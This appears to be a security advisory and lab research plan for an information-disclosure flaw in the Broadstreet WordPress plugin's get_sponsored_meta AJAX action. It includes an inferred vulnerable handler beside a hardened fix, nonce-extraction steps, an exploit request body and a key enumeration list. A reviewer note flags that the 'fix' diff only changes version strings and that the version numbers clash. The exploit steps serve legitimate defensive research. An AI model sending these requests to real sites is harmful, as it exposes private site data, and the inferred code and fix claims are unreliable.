Broadstreet <= 1.52.2 - Authenticated (Subscriber+) Private Post Meta Disclosure via get_sponsored_meta
Description
The Broadstreet plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.52.2 via the get_sponsored_meta AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disclose any private post metadata.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Technical Details
What Changed in the Fix
Changes introduced in v1.53.2
Source Code
WordPress.org SVN
This research plan targets a Post Meta Disclosure (IDOR) vulnerability in the Broadstreet plugin. While the full source of the AJAX handler is not provided in the snippet, the vulnerability description and common WordPress plugin patterns allow for a precise reconstruction of the exploitation path.
1. Vulnerability Summary
The Broadstreet plugin registers an AJAX action get_sponsored_meta that lacks proper authorization and input validation. Specifically, it allows a user to provide an arbitrary key parameter which is passed directly to get_post_meta(). Because WordPress does not inherently protect "private" meta keys (those starting with an underscore) from get_post_meta calls when the key name is known, any authenticated user can bypass intended visibility restrictions to leak sensitive internal data.
2. Attack Vector Analysis
- Endpoint: `/wp-admin/admin-ajax.php`
- Action: `get_sponsored_meta`
- Vulnerable Parameter: `key` (user-controlled meta key name)
- Identifier Parameter: `post_id` (the ID of the post to query)
- Authentication: Subscriber level or higher.
- Preconditions: The attacker must have a valid nonce if the plugin implements `check_ajax_referer()` (likely), and the target meta key must exist for the specified `post_id`.
3. Code Flow (Inferred)
- Registration: `Broadstreet_Core::execute()` (in `Broadstreet/Core.php`) likely calls a method that registers the AJAX handler: `add_action('wp_ajax_get_sponsored_meta', array($this, 'get_sponsored_meta'));`
- Handler Execution: The handler (presumably `get_sponsored_meta`) retrieves input: `$post_id = $_POST['post_id']; $meta_key = $_POST['key'];`
- The Sink: The code calls the native WordPress function without verifying whether the key is public: `$value = get_post_meta($post_id, $meta_key, true); echo $value; wp_die();`
- The Bypass: By providing a key like `_wp_attached_file` or a custom secret key (e.g., `_bs_metadata`), the attacker receives data they shouldn't see.
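To show what the missing validation looks like in code, here is the inferred vulnerable handler shape from the flow above next to a hardened version of the same handler. This is an added example, not Broadstreet's code; the action name, nonce action and the allowed key names are assumptions.

```php
<?php
// Added example (not Broadstreet's code). Function names, the nonce action
// and the allowlisted keys are illustrative assumptions.

// Inferred vulnerable shape: key and post_id flow straight into get_post_meta().
// Any authenticated caller can read any meta key of any post, including
// WordPress-protected keys that start with an underscore.
function example_get_sponsored_meta_vulnerable() {
    $post_id  = $_POST['post_id'];
    $meta_key = $_POST['key'];
    $value    = get_post_meta($post_id, $meta_key, true);
    echo $value;
    wp_die();
}

// Hardened version of the same AJAX action: every input is constrained.
function example_get_sponsored_meta_hardened() {
    // 1. CSRF: bind the request to a nonce issued for this specific action.
    check_ajax_referer('example_sponsored_meta', 'nonce');

    // 2. Allowlist: only the keys this feature legitimately exposes.
    //    These key names are illustrative, not Broadstreet's real keys.
    $allowed  = array('example_sponsor_name', 'example_sponsor_url');
    $meta_key = isset($_POST['key']) ? sanitize_key(wp_unslash($_POST['key'])) : '';
    if (!in_array($meta_key, $allowed, true)) {
        wp_send_json_error('invalid key', 400);
    }

    // 3. Defense in depth: never return WordPress-protected (_-prefixed) meta,
    //    even if the allowlist is later edited carelessly.
    if (is_protected_meta($meta_key, 'post')) {
        wp_send_json_error('invalid key', 400);
    }

    // 4. Object-level authorization: the caller must be allowed to read this
    //    particular post, not merely be logged in (the IDOR root cause).
    $post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
    if (!$post_id || !current_user_can('read_post', $post_id)) {
        wp_send_json_error('forbidden', 403);
    }

    wp_send_json_success(get_post_meta($post_id, $meta_key, true));
}

// Registration for logged-in users only; no wp_ajax_nopriv_ hook is added.
add_action('wp_ajax_example_get_sponsored_meta', 'example_get_sponsored_meta_hardened');
```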
4. Nonce Acquisition Strategy
Broadstreet typically localizes its configuration and nonces for its dashboard and widgets.
- Identify Script Localization: The plugin likely uses `wp_localize_script` to pass a nonce to the frontend. Based on common Broadstreet patterns, the object name is likely `BroadstreetConfig` or `broadstreet_vars`.
- Creation of Environment: Since Broadstreet is an ad-management plugin, its scripts usually load on the WordPress dashboard for all authenticated users.
- Extraction Steps:
  - Log in as a Subscriber.
  - Navigate to the WordPress Dashboard (`/wp-admin/index.php`).
  - Use `browser_eval` to search for the nonce: `browser_eval("window.BroadstreetConfig?.nonce || window.broadstreet_vars?.nonce")`
  - If not found, search the HTML source for `check_ajax_referer` action strings like `broadstreet_nonce` or `get_sponsored_meta`.
5. Test Data Setup
To prove the vulnerability, we need a "private" meta key attached to a post.
- Create a target post: `wp post create --post_type=post --post_title="Target Post" --post_status=publish` (note the ID, e.g., `123`).
- Add private metadata: `wp post meta add 123 _secret_internal_key "CONFIDENTIAL_AD_REVENUE_DATA"`
- Create a Subscriber user: `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`
6. Exploitation Strategy
- Authentication: Authenticate as the Subscriber user and obtain session cookies.
- Nonce Retrieval:
  - Navigate to `/wp-admin/` using `browser_navigate`.
  - Execute `browser_eval` to extract the `nonce` and the `ajax_url`.
- Exploit Request:
  - Use the `http_request` tool to send a POST request to `/wp-admin/admin-ajax.php`.
  - Headers: `Content-Type: application/x-www-form-urlencoded`
  - Body: `action=get_sponsored_meta&post_id=123&key=_secret_internal_key&_wpnonce=[NONCE]`
  - (Note: The parameter name for the nonce might be `nonce` or `_wpnonce`; this should be verified during the extraction step.)
7. Expected Results
- Success: The HTTP response body contains the string `CONFIDENTIAL_AD_REVENUE_DATA`.
- Response Code: `200 OK`.
- Security Failure: The plugin returns the value of a meta key prefixed with an underscore, which is the standard WordPress convention for protected/hidden metadata.
8. Verification Steps
- Verify Payload: Compare the HTTP response content with the output of: `wp post meta get 123 _secret_internal_key`
- Check Scope: Attempt to retrieve a core WordPress private key to show impact: `action=get_sponsored_meta&post_id=123&key=_edit_last`. If it returns a User ID, the disclosure is confirmed.
9. Alternative Approaches
- If Nonce is not found in Admin: Some Broadstreet features are intended for the frontend. Create a page with a Broadstreet widget/shortcode (if identified via `grep -r "add_shortcode"`) and extract the nonce from the public-facing page.
- Blind Disclosure: If the plugin does not `echo` the result but uses it in a way that affects the UI, observe changes in the response length or specific HTML elements returned.
- Key Enumeration: If the specific key name is unknown, common WordPress keys to test include: `_wp_attached_file`, `_wp_page_template`, `_edit_lock`, `_edit_last`.
Summary
The Broadstreet plugin for WordPress is vulnerable to an authorization bypass via the `get_sponsored_meta` AJAX action due to missing validation on the user-controlled `key` parameter. This allows authenticated attackers with Subscriber-level access or higher to disclose any private post metadata by requesting keys that are typically hidden (prefixed with an underscore).
Security Fix
@@ -140,4 +140,4 @@ } } -define('BROADSTREET_VERSION', '1.53.1'); +define('BROADSTREET_VERSION', '1.53.2'); @@ -3,7 +3,7 @@ Plugin Name: Broadstreet Plugin URI: http://broadstreetads.com Description: Integrate Broadstreet business directory and adserving power into your site -Version: 1.53.1 +Version: 1.53.2 Tested up to: 6.9 Author: Broadstreet Author URI: http://broadstreetads.com @@ -3,7 +3,7 @@ Tags: broadstreet,local,publishers,hyperlocal,independent,news,business,directory Requires at least: 3.0 Tested up to: 6.9 -Stable tag: 1.53.1 +Stable tag: 1.53.2 Integrate Broadstreet adserving power into your site. Only in /home/deploy/wp-safety.org/data/plugin-versions/broadstreet/1.53.2: trunk
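Review bot: none of the three hunks touch the get_sponsored_meta AJAX handler; they only move BROADSTREET_VERSION in Core.php, the plugin header Version and the readme Stable tag from 1.53.1 to 1.53.2, and the trailing "Only in .../broadstreet/1.53.2: trunk" line is directory-compare output rather than a code change. As shown, the patch therefore does not evidence the key validation or per-post authorization check the advisory says was fixed; the handler change should be included in or referenced from this diff so the fix can be confirmed. The bump from 1.53.1 also sits oddly beside the title's affected range of <= 1.52.2, which is worth reconciling.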
Exploit Outline
1. Authenticate as a Subscriber-level user to obtain valid session cookies.
2. Locate the AJAX nonce by extracting it from localized JavaScript variables on the WordPress dashboard (likely within 'broadstreet_vars' or 'BroadstreetConfig' objects).
3. Send a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'get_sponsored_meta'.
4. Include the target post ID in the 'post_id' parameter and the desired private metadata key in the 'key' parameter (e.g., '_wp_attached_file' or '_edit_last').
5. Observe that the server returns the value of the requested private meta key, bypassing the standard WordPress protection for keys prefixed with an underscore.